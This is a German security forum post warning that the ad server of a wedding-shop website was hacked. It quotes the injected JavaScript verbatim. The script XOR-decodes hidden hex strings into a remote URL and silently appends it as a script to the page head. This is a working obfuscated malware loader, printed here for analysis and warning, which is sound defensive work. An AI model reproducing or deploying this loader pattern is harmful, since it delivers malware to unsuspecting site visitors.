Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 07.10.2014, 12:53   #1
zahni
 
Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer" - Standard

Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"



Hi,

ich bin neu hier. Warum? Avira hat sein Board zu gemacht

In der Fa. nervt sein ein paar Tagen unser IDS von Symantec wg. eines Browser Exploits.

Ein Wenig Forschung ergab, dass der OpenX Server auf httx://www. weddix. de/hochzeitsshop/hochzeitskarten/shop-hochzeitskarten-einladungskarten-danksagungskarten.html

Gehackt wurde. Leider zum wiederholten Mal. Provider und Betreiber sind leider merkbefreit, trotz mehrfacher Information. Heute sogar per Telefon.

Das Problem: Die Javascript-Verschleierung ist wohl recht kreativ und wird von keinem Scanner erkannt:

Code:
ATTFilter
var OA_output = new Array(); 
OA_output['59'] = '';
OA_output['59'] += "<"+"script>var xLGXZkx = \"60d3f856128f68beac15f6f1f9daec7d16f06a73deb934dd155b3d4ed1bf3984f2b9bd96f740dbf4ced41c0206ba0a770e007c3e382631b1101e74592e06736534b8eb675ae1a0be24\";var PJkHGCh = \"08a78c2628a047d8cd76d8949ea39c097f910410b1cd40b27b285527a3cb4aaa91d6d0b99535af80aba6336768ce6f057e72154d5d551ed87d731d3e5c67070c5bd6c40e2a928ed457\";var oSlaGFi = \"\";var w=0x00;for(var i=0;i<"+"(xLGXZkx.length/2);i++){oSlaGFi += String.fromCharCode(parseInt((xLGXZkx[w]+xLGXZkx[w+1]),16)^parseInt((PJkHGCh[w]+PJkHGCh[w+1]),16));w += 2;}var miners = document.getElementsByTagName(\"he\" + \"ad\").item(0);var war = document.createElement(\"sc\" + \"ri\" + \"pt\");war.setAttribute(\"t\" + \"ype\", \"te\" + \"xt/java\" + \"scr\" + \"ipt\");war.setAttribute(\"a\" + \"sync\", \"t\" + \"rue\");war.setAttribute(\"s\" + \"rc\", oSlaGFi);if(document.cookie.indexOf(\"rigid\")==-1){miners.appendChild(war);document.cookie = \"rigid=slowdown; path=/; expires=Thu, 09 Oct 14 22:31:56 +0400;\";}<"+"/script><"+"a href=\'hxxp://adserver.weddix.de/www/delivery/ck.php?oaparams=2__bannerid=175__zoneid=59__OXLCA=1__cb=ec30b2780b__oadest=http%3A%2F%2Fwww.weddix.de%2Fhochzeitsshop%2Fshop-personalisiertes.html\' target=\'_blank\'><"+"img src=\'hxxp://adserver.weddix.de/www/images/163ffdafaed28387897c1783be3aa05a.gif\' width=\'300\' height=\'250\' alt=\'Personalisiertes - das pers�nliche Extra\' title=\'Personalisiertes - das pers�nliche Extra\' border=\'0\' /><"+"/a><"+"div id=\'beacon_ec30b2780b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'hxxp://adserver.weddix.de/www/delivery/lg.php?bannerid=175&amp;campaignid=55&amp;zoneid=59&amp;OXLIA=1&amp;loc=http%3A%2F%2Fwww.weddix.de%2Fhochzeitsshop%2F%3F_%24ja%3Dtsid%3A58600%7Ccgn%3A51370668361%7Ckw%3Aweddix%26gclid%3DCK3xw4LVmMECFY_MtAodmicA2g&amp;referer=http%3A%2F%2Fwww.google.de%2Faclk%3Fsa%3Dl%26ai%3DCQMPQXuAyVOy6AuWYzAOk54KoA5n0ursD2Y68w78BvfrFzgIIABABII2WphgoAlDu7Jnp_P____8BYJWKtoLEB6ABpJ7B_wPIAQGqBCFP0EK_zdkXtfNv-SM5z8K7CmhcwYtChMNu9LDUKM0hJ1KABZBOgAfE4T6QBwOoB6a-Gw%26sig%3DAOD64_1Tz4tt39w_mfvD0VKfoNjm3DK0Kg%26rct%3Dj%26q%3D%26ved%3D0CCMQ0Qw%26adurl%3Dhttp%3A%2F%2Ft23.intelliad.de%2Findex.php%253Fredirect%253Dhttp%25253A%25252F%25252Fwww.weddix.de%25252Fhochzeitsshop%25252F%25253F_%252524ja%25253Dtsid%25253A58600%25257Ccgn%25253A51370668361%25257Ckw%25253Aweddix%2526cl%253D5383938303236323131303%2526bm%253D1%2526bmcl%253D4303037313536343737303%2526cp%253D110855761%2526ag%253D11696626081%2526sbm%253D1%2526ad%253D51370668361%2526pl%253D%2526bk%253Dweddix%2526admt%253Dp&amp;cb=ec30b2780b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
         
Wer mag, kann sich ja mal darum "kümmern"

PS: Die Analyse auf JSUNPACK:

hxxp://jsunpack. jeek. org/?report=d56ba3462d530a0a10b9de62f9766865559a16d1

Antwort

Themen zu Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"
absolute, achtung, avira, bla, blank, board, browser, code, erkannt, heute, hidden, kreativ, nervt, neu, neuartiger, problem, recht, scan, scanner, server, style, symantec, tagen, trotz, warum, wenig



Ähnliche Themen: Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"


  1. win 7 firefox langsam "keine Rückmeldung" immer wieder Meldung "ein skript auf dieser Seite ist eventuell beschädigt...."
    Plagegeister aller Art und deren Bekämpfung - 14.01.2015 (11)
  2. Diverse Malware ("CoolSaleCoupon", "ddownlloaditkeep", "omiga-plus", "SaveSense", "SaleItCoupon"); lahmer PC & viel Werbung!
    Plagegeister aller Art und deren Bekämpfung - 11.01.2015 (16)
  3. RegSvr32 "Fehler beim Laden des Moduls """ (mal wieder...)
    Log-Analyse und Auswertung - 21.08.2014 (6)
  4. "monstermarketplace.com" Infektion und ihre Folgen; "Anti-Virus-Blocker"," unsichtbare Toolbars" + "Browser-Hijacker" von selbst installiert
    Log-Analyse und Auswertung - 16.11.2013 (21)
  5. "Polizei-Trojaner - österr. Variante" - Ist mein PC wieder "sauber"?
    Plagegeister aller Art und deren Bekämpfung - 11.07.2012 (1)
  6. "Achtung System sperre zahlen sie 100€ zum entsperren" was soll ich machen ...
    Log-Analyse und Auswertung - 09.04.2012 (5)
  7. Virus: "Achtung! Aus Sicherheitsgründen wurde Ihr Windowssystem blockiert", OTL ausgeführt, was nun?
    Log-Analyse und Auswertung - 08.04.2012 (5)
  8. Trojaner-Befall: "Achtung - Ihr Windows wurde aus Sicherheitsgründen gesperrt.."
    Log-Analyse und Auswertung - 26.03.2012 (9)
  9. Meldung: "Achtung aus Sicherheitsgründen wurde ihr Windowssystem blockiert", wie bei anderen.
    Plagegeister aller Art und deren Bekämpfung - 04.03.2012 (2)
  10. Ein weiteres "Achtung aus Sicherheitsgründen wurde ihr Windows gespeert" Opfer
    Log-Analyse und Auswertung - 08.02.2012 (4)
  11. windows security center " Achtung! Ihr Computer wurde gesperrt! " Nr. 2
    Alles rund um Windows - 31.01.2012 (1)
  12. windows security center " Achtung! Ihr Computer wurde gesperrt! "
    Alles rund um Windows - 31.01.2012 (1)
  13. 50 euro Virus "Achtung aus Sicherheitsgruenden wurde ihr Windowssystem blockiert"
    Log-Analyse und Auswertung - 18.01.2012 (10)
  14. Nicht sicher, ob PC nach "System Fix" Entfernung wieder "sauber"
    Log-Analyse und Auswertung - 07.01.2012 (18)
  15. Achtung! Aus Sicherheitsgründen wurde Ihr Windowssystem blockiert ... "bezahlen und runterladen"
    Log-Analyse und Auswertung - 05.01.2012 (9)
  16. Virus/Trojaner "Achtung! Windows wurde aus Sicherheitsgründen gesperrt"
    Log-Analyse und Auswertung - 29.12.2011 (13)
  17. "Adware.Virtumonde"/"Downloader.MisleadApp"/"TR/VB.agt.4"/"NewDotNet.A.1350"/"Fakerec
    Plagegeister aller Art und deren Bekämpfung - 22.08.2008 (6)

Zum Thema Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer" - Hi, ich bin neu hier. Warum? Avira hat sein Board zu gemacht In der Fa. nervt sein ein paar Tagen unser IDS von Symantec wg. eines Browser Exploits. Ein Wenig - Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"...
Archiv
Du betrachtest: Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer" auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.